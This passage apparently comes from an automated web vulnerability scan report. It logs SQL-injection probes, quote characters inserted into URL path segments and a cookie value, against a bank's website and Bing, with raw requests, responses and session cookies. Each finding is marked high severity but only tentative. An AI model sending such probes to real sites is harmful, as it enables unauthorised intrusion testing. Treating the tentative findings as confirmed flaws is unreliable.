Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:56 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products''/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:57 GMT
location: http://www.bbt.com/bbt/personal/products%27%27/checkcard/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 168
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products%27%27/checkcard/default.html">here</a>.</body>

1.83. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/checkcard/default.html

Issue detail

Request 1

GET /bbt/personal/products/checkcard'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:02 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products/checkcard''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:04 GMT
location: http://www.bbt.com/bbt/personal/products/checkcard%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 168
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/checkcard%27%27/default.html">here</a>.</body>

1.84. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/checkcard/default.html

Issue detail

Request 1

GET /bbt/personal/products/checkcard/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:10 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products/checkcard/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:10 GMT
location: http://www.bbt.com/bbt/personal/products/checkcard/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 168
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/checkcard/default.html%27%27">here</a>.</body>

1.85. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/onlinebanking/default.html

Issue detail

Request 1

GET /bbt'/personal/products/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:45 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/personal/products/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:45 GMT
location: http://www.bbt.com/bbt/%27%27/personal/products/onlinebanking/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 173
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/personal/products/onlinebanking/default.html">here</a>.</body>

1.86. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/onlinebanking/default.html

Issue detail

Request 1

GET /bbt/personal'/products/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:55 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal''/products/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:55 GMT
location: http://www.bbt.com/bbt/personal%27%27/products/onlinebanking/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 172
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal%27%27/products/onlinebanking/default.html">here</a>.</body>

1.87. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/onlinebanking/default.html

Issue detail

Request 1

GET /bbt/personal/products'/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:01 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products''/onlinebanking/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:01 GMT
location: http://www.bbt.com/bbt/personal/products%27%27/onlinebanking/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 172
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products%27%27/onlinebanking/default.html">here</a>.</body>

1.88. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/onlinebanking/default.html

Issue detail

Request 1

GET /bbt/personal/products/onlinebanking'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:09 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products/onlinebanking''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:09 GMT
location: http://www.bbt.com/bbt/personal/products/onlinebanking%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 172
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/onlinebanking%27%27/default.html">here</a>.</body>

1.89. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/onlinebanking/default.html

Issue detail

Request 1

GET /bbt/personal/products/onlinebanking/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:14 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal/products/onlinebanking/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:49:14 GMT
location: http://www.bbt.com/bbt/personal/products/onlinebanking/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 172
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/onlinebanking/default.html%27%27">here</a>.</body>

1.90. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/sitemap.html

Issue detail

Request 1

GET /bbt'/sitemap.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:19 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/sitemap.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:19 GMT
location: http://www.bbt.com/bbt/%27%27/sitemap.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 141
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/sitemap.html">here</a>.</body>

1.91. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/sitemap.html

Issue detail

Request 1

GET /bbt/sitemap.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt/sitemap.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:40 GMT
location: http://www.bbt.com/bbt/sitemap.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 140
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/sitemap.html%27%27">here</a>.</body>

1.92. http://www.bing.com/blogs/search [SRCHUSR cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/blogs/search

Issue detail

Request 1

GET /blogs/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112'; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 7821
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /blogs/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112''; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14222
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:28 GMT
Connection: close
Set-Cookie: _UR=OMW=1; expires=Sat, 02-Feb-2013 13:50:27 GMT; domain=.bing.com; path=/

